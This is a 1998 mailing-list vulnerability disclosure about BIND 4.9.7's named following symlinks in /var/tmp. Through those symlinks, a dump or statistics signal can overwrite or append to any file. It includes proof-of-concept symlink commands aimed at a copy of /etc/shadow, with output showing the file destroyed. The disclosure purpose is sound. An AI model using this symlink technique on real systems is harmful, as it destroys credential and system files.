X-RDate: Sat, 11 Apr 1998 12:43:40 +0600 (ESD)
Date: Fri, 10 Apr 1998 13:29:20 -0700
From: Joe <[email protected]>
To: [email protected]Subject: BIND 4.9.7 named follows symlinks, clobbers anything.
[ Posted to BUGTRAQ and comp.protocols.dns.bind ]
[ Standard apologies if this is already known - a search on the Bugtraq
archive and Deja News comp.protocols.dns.bind doesn't indicate it.]
The new named(8) happily follows symlinks and clobbers any file on the
system when it receives a SIGINT. (Used for debugging and statistics
gathering) SIGINT dumps the named database to /var/tmp/named_dump.db
It will also happily append data to any system file when it receives a
SIGIOT. SIGIOT appends named statistics to /var/tmp/named.stats.
This problem is probably recursive to previous versions of named but since
I've already replaced mine I can't confirm that.
On Wed, 8 Apr 1998, Aleph One wrote:
[Snippage of the latest CERT]
> (Note: the in.named(8) man page mentions that sending a SIGINT to the
> in.named process will dump the current data base and cache to, by
> default, /var/tmp/named_dump.db. Some sites may find this useful in
> looking for self-referential CNAMEs. Please see the in.named(8) man
> page for further details.)
This caught my eye in that CERT advisory and after updating my BIND to the
new 4.9.7 ( RedHat 4.2 Linux 2.0.30 i586 ) and reading through the
named(8) man pages I ran a quick check.
[root]# cp /etc/shadow /etc/junk.shadow
[root]# ls -l /etc/junk.shadow
-r-------- 1 root root 992 Apr 10 12:52 junk.shadow
Now as a non-priv user..
[Luser]# ln -s /etc/junk.shadow /var/tmp/named_dump.db
[Luser]# ln -s /etc/junk.shadow /var/tmp/named.stats
[Luser]# logout
(Now if ever root sends a SIGINT or SIGIOT /etc/junk.shadow is toast...)
[root]# kill -SIGIOT [named.pid]
[root]# ls -al /etc/junk.shadow
-r-------- 1 root root 2251 Apr 10 13:00 /etc/junk.shadow
[root]# less /etc/junk.shadow
someusrr:[removed of course]:10311:-1:-1:-1:-1:-1:-1
nothrusr:[removed of course]:10316:-1:-1:-1:-1:-1:-1
+++ Statistics Dump +++ (892238406) Fri Apr 10 13:00:06 1998
2368 time since boot (secs)
2368 time since reset (secs)
0 Unknown query types
<SNIP>
The statistics dump gets appended to any file on the system.
Now for the real horror -
[root]# kill -SIGINT [named.pid]
[root]# ls -l /etc/junk.shadow
-r-------- 1 root root 5249 Apr 10 13:02 /etc/junk.shadow
[root]# less /etc/junk.shadow
; Dumped at Fri Apr 10 13:02:40 1998
;; ++zone table++
<SNIP>
No trace of the original remains. Your shadow password file or anything
else on the system is fried.
Enjoy.
--
Joe H. Technical Support
General Support: [email protected] Blarg! Online Services, Inc.
Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net